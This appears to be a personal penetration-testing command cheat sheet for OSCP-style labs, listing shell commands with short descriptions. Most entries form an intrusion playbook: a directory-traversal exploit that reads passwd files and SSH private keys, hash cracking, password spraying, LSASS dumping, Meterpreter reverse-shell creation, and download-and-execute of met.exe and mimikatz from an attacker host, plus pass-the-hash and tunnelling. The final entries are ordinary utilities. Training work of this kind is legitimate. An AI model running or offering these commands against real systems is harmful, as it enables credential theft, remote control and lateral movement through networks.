desc: WPScan of the WordPress web page on WEBSRV1
|
||
- cmd: searchsploit duplicator
|
||
lang: sh
|
||
tags: oscp
|
||
desc: SearchSploit results for the Duplicator WordPress plugin
|
||
- cmd: searchsploit -x 50420
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Searchsploit command to examine a specific exploit
|
||
- cmd: cd beyond/websrv1 ; searchsploit -m 50420
|
||
lang: sh
|
||
tags: oscp
|
||
desc: SearchSploit command to copy the exploit script to the current directory
|
||
- cmd: python3 50420.py http://192.168.50.244 /etc/passwd
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Performing a Directory Traversal attack on WEBSRV1
|
||
- cmd: python3 50420.py http://192.168.50.244 /home/marcus/.ssh/id_rsa ; python3 50420.py http://192.168.50.244 /home/daniela/.ssh/id_rsa
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Retrieving the SSH private key of daniela
|
||
- cmd: ssh2john id_rsa > ssh.hash ; john --wordlist=/usr/share/wordlists/rockyou.txt ssh.hash
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Cracking the passphrase of the SSH private key
|
||
- cmd: ssh -i id_rsa daniela@192.168.50.244
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Accessing WEBSRV1 via SSH
|
||
- cmd: sudo git -p help config
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Abusing git sudo command by launching pager in a privileged context
|
||
- cmd: cd /srv/www/wordpress/ ; git status ; git log
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Examining the Git repository
|
||
- cmd: git show 612ff5783cc5dbd1e0e008523dba83374a84aaf1
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Displaying the differences between the two commits
|
||
- cmd: cat creds.txt
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Displaying contents of creds.txt
|
||
- cmd: cat usernames.txt ; cat passwords.txt
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Displaying the created lists containing the identified usernames and passwords
|
||
- cmd: crackmapexec smb 192.168.50.242 -u usernames.txt -p passwords.txt --continue-on-success
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Checking for valid credentials with CrackMapExec
|
||
- cmd: crackmapexec smb 192.168.56.30 -u users.txt -p users.txt --no-bruteforce
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Try the classic user=password test
|
||
- cmd: sprayhound -lu bob -lp superman -U users.txt -d mini.lab -dc 192.168.56.30 --lower -t 2
|
||
lang: sh
|
||
tags: oscp
|
||
desc: try sprayhound with a valid user to avoid locking account (option -t to set the number of try left)
|
||
- cmd: crackmapexec smb 192.168.50.242 -u john -p "dqsTwTpZPn#nL" --shares
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Listing SMB shares on MAILSRV1 with CrackMapExec
|
||
- cmd: crackmapexec smb 192.168.56.30 -u bob -p 'superman' -d mini.lab --users
|
||
lang: sh
|
||
tags: oscp
|
||
desc: see the status of bruteforce
|
||
- cmd: netexec smb 192.168.56.30 -u guest -p '' --rid-brute
|
||
lang: sh
|
||
tags: oscp
|
||
desc: netexec to enumerate user account names on the host with a RID cycle attack
|
||
- cmd: netexec smb 192.168.56.30 -u ben -p /usr/share/seclists/Passwords/500-worst-passwords.txt --continue-on-success
|
||
lang: sh
|
||
tags: oscp
|
||
desc: netexec to password spray SMB
|
||
- cmd: netexec rdp 192.168.56.30 -u ben -p /usr/share/seclists/Passwords/500-worst-passwords.txt
|
||
lang: sh
|
||
tags: oscp
|
||
desc: netexec to password spray RDP
|
||
- cmd: netexec winrm 192.168.56.31 -u bob -p /usr/share/seclists/Passwords/500-worst-passwords.txt
|
||
lang: sh
|
||
tags: oscp
|
||
desc: netexec to password spray WINRM
|
||
- cmd: lsassy -d mini.lab -u bob -p superman -m dumpertdll -O dumpertdll_path=~/hs/ressources/Outflank-Dumpert-DLL.dll 192.168.56.31
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Dumping LSASS
|
||
- cmd: impacket-GetADUsers -dc-ip 192.168.56.30 -all mini.lab/bob:superman
|
||
lang: sh
|
||
tags: oscp
|
||
desc: List all users on AD using an account
|
||
- cmd: ldapsearch -H ldap://192.168.56.30 -D "bob@mini.lab" -w superman -b 'DC=mini,DC=lab' "(&(objectCategory=person)(objectClass=user))" |grep 'distinguishedName:'
|
||
lang: sh
|
||
tags: oscp
|
||
desc: List all users on AD using an account and ldap
|
||
- cmd: mkdir /home/kali/beyond/webdav ; /home/kali/.local/bin/wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root /home/kali/beyond/webdav/
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Starting WsgiDAV on port 80
|
||
- cmd: swaks --server 10.10.87.13 --auth-user f.miller@skylark.com --auth-pass w35oyfm9C95cXEm21GYY -q AUTH
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Check a smtp account
|
||
- cmd: whoami ; hostname ; ipconfig
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Obtaining basic information about the target machine
|
||
- cmd: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.119.5 LPORT=443 -f exe -o met.exe
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Creating a Meterpreter reverse shell executable file
|
||
- cmd: sudo msfconsole -q ; use multi/handler ; set payload windows/x64/meterpreter/reverse_tcp ; set LHOST 192.168.119.5 ; set LPORT 443 ; set ExitOnSession false ; run -j
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Starting Metasploit listener on port 443
|
||
- cmd: iwr -uri http://192.168.119.5:8000/met.exe -Outfile met.exe ; .\met.exe
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Downloading and executing Meterpreter reverse shell
|
||
- cmd: use multi/manage/autoroute ; set session 1 ; run ; use auxiliary/server/socks_proxy ; set SRVHOST 127.0.0.1 ; set VERSION 5 ; run -j
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Creating a SOCKS5 proxy to access the internal network from our Kali machine
|
||
- cmd: cat /etc/proxychains4.conf
|
||
lang: sh
|
||
tags: oscp
|
||
desc: proxychains configuration file settings
|
||
- cmd: proxychains -q crackmapexec smb 172.16.6.240-241 172.16.6.254 -u john -d beyond.com -p "dqsTwTpZPn#nL" --shares
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Enumerating SMB with CrackMapExec and proxychains
|
||
- cmd: ~/hs/tools/chisel server -p 8080 --reverse
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Setting up Chisel on Kali to access the Web Server on INTERNALSRV1 via Browser
|
||
- cmd: sessions -i 1 ; upload chisel.exe C:\\Users\\marcus\\chisel.exe
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Uploading Chisel to CLIENTWK1 via our Meterpreter session
|
||
- cmd: chisel.exe client 192.168.119.5:8080 R:80:172.16.6.241:80
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Utilizing Chisel to set up a reverse port forwarding to port 80 on INTERNALSRV1
|
||
- cmd: proxychains -q impacket-GetUserSPNs -request -dc-ip 172.16.6.240 beyond.com/john
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Kerberoasting the daniela user account
|
||
- cmd: sudo hashcat -m 13100 daniela.hash /usr/share/wordlists/rockyou.txt --force
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Cracking the TGSREP hash
|
||
- cmd: cd C:\Users\Administrator ; iwr -uri http://192.168.119.5:8000/met.exe -Outfile met.exe ; .\met.exe
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Downloading and executing the Meterpreter reverse shell
|
||
- cmd: iwr -uri http://192.168.119.5:8000/mimikatz.exe -Outfile mimikatz.exe ; .\mimikatz.exe
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Downloading and launching the newest version of Mimikatz from our Kali machine
|
||
- cmd: proxychains -q impacket-psexec -hashes 00000000000000000000000000000000:f0397ec5af49971f6efbdb07877046b3 beccy@172.16.6.240
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Using psexec to get an interactive shell
|
||
- cmd: ~/hs/tools/reverse-sshx64 -l -v
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Listen and bind reversessh
|
||
- cmd: issh -i ~/hs/ressources/rssh/id_reverse-ssh localhost -p1234
|
||
lang: sh
|
||
tags: oscp
|
||
desc: connect back using reverse-ssh
|
||
- cmd: iscp -i ~/hs/ressources/rssh/id_reverse-ssh -P40633 localhost:/C:/Users/Administrator/20231208013035_BloodHound.zip ./
|
||
lang: sh
|
||
tags: oscp
|
||
desc: using file transfert with reverse-ssh (windows target)
|
||
- cmd: frpc tcp -r 6001 -i 127.0.0.1 -l 7001 -n tunnel-name
|
||
lang: sh
|
||
tags: COMMON
|
||
desc: fast reverse tunnel 127.0.0.1:7001 to gb.hackade.org:6001 (need ghostunnel and chisel)
|
||
- cmd: tail --pid=$(pgrep procname) -f /dev/null && ntf send finished
|
||
lang: sh
|
||
tags: COMMON
|
||
desc: wait and send message when a process is fish
|
||
- cmd: python3 -mvenv ~/.virtualenvs/wsgidav
|
||
lang: sh
|
||
tags: COMMON
|
||
desc: create a new python virtualenvs
|
||
- cmd: source ~/.virtualenvs/wsgidav/bin/activate
|
||
lang: sh
|
||
tags: COMMON
|
||
desc: use a python venv
|
||
- cmd: python3 -mvenv ~/.virtualenvs/reindent ; source ~/.virtualenvs/wsgidav/bin/reindent; reindent
|
||
lang: sh
|
||
tags: COMMON
|
||
desc: install and use reindent for Python
|
||
- cmd: cat ips | grep -E -o "([0-9]{1,3}[\.]){3}[0-9]{1,3}" | sort | sponge ips
|
||
lang: sh
|
||
tags: COMMON
|
||
desc: extract ips from file
|
||
- cmd: paste -d ' ' old_ips ips | xargs -I{} bash -c "mv {}"
|
||
lang: sh
|
||
tags: COMMON
|
||
desc: batch rename directory
|
||
- cmd: ping -M do -s <mtu-value> 192.168.1.1
|
||
lang: sh
|
||
tags: COMMON
|
||
desc: check for the correct MTU value
|
||
- cmd: ip link set dev tun0 mtu 1250
|
||
lang: sh
|
||
tags: COMMON
|
||
desc: change the mtu value for an interface
|
||
- cmd: sudo ip tuntap add user kali mode tun ligolo; sudo ip link set ligolo up
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Setup Ligolo-ng proxy
|
||
- cmd: ~/hs/tools/ligolo-ng-proxy -selfcert
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Launch Ligolo-ng proxy using self-signed certs
|
||
- cmd: ~/hs/tools/ligolo-ng-proxy -selfcert -laddr 0.0.0.0:7777
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Launch Ligolo-ng proxy using self-signed certs and custom port
|
||
- cmd: sudo ip route add 192.168.0.0/24 dev ligolo
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Add a route on the proxy/relay server to the 192.168.0.0/24 agent network
|
||
- cmd: ligolo-ng-agent -ignore-cert -connect 192.168.45.157:11601
|
||
lang: sh
|
||
tags: oscp
|
||
desc: connect ligolo-ng agent
|
||
- cmd: ligolo-ng » listener_add --addr 0.0.0.0:1234 --to 127.0.0.1:4321 --tcp
|
||
lang: sh
|
||
tags: oscp
|
||
desc: create a TCP listening socket on the agent (0.0.0.0:1234) and redirect connections to the 4321 port of the proxy server.
|
||
- cmd: ligolo-ng » session
|
||
lang: sh
|
||
tags: oscp
|
||
desc: select a target
|
||
- cmd: ligolo-ng » ifconfig
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Display the network configuration of the agent
|
||
- cmd: ligolo-ng » start_tunnel
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Start the tunnel on the proxy
|
||
- cmd: ligolo-ng » listener_list
|
||
lang: sh
|
||
tags: oscp
|
||
desc: view currently running listeners
|
||
- cmd: sudo ip route add 240.0.0.1/32 dev ligolo; nmap 240.0.0.1 -sV
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Access to agent's local ports (127.0.0.1)
|
||
- cmd: ~/hs/tools/servedir.py ~/hs/ressources
|
||
lang: sh
|
||
tags: oscp
|
||
desc: launch local webserver to serve ressources files
|
||
- cmd: sudo ~/hs/tools/servedir.py ~/hs/ressources 80
|
||
lang: sh
|
||
tags: oscp
|
||
desc: launch local webserver to serve ressources files on port 80
|
||
- cmd: powershell Get-ChildItem -Path C:\users -Include *.txt -File -Recurse -ErrorAction SilentlyContinue
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: search all txt files in users home
|
||
- cmd: impacket-psexec 'Administrator:password@172.16.138.10'
|
||
lang: sh
|
||
tags: oscp
|
||
desc: psexec using a local login/password
|
||
- cmd: sudo lsof -nP -i tcp
|
||
lang: sh
|
||
tags: COMMON
|
||
desc: list process listing tcp socket
|
||
- cmd: sudo lsof -u 1000
|
||
lang: sh
|
||
tags: COMMON
|
||
desc: list files used by UID 1000
|
||
- cmd: sudo lsof -p 2658
|
||
lang: sh
|
||
tags: COMMON
|
||
desc: list files used by PID 2658
|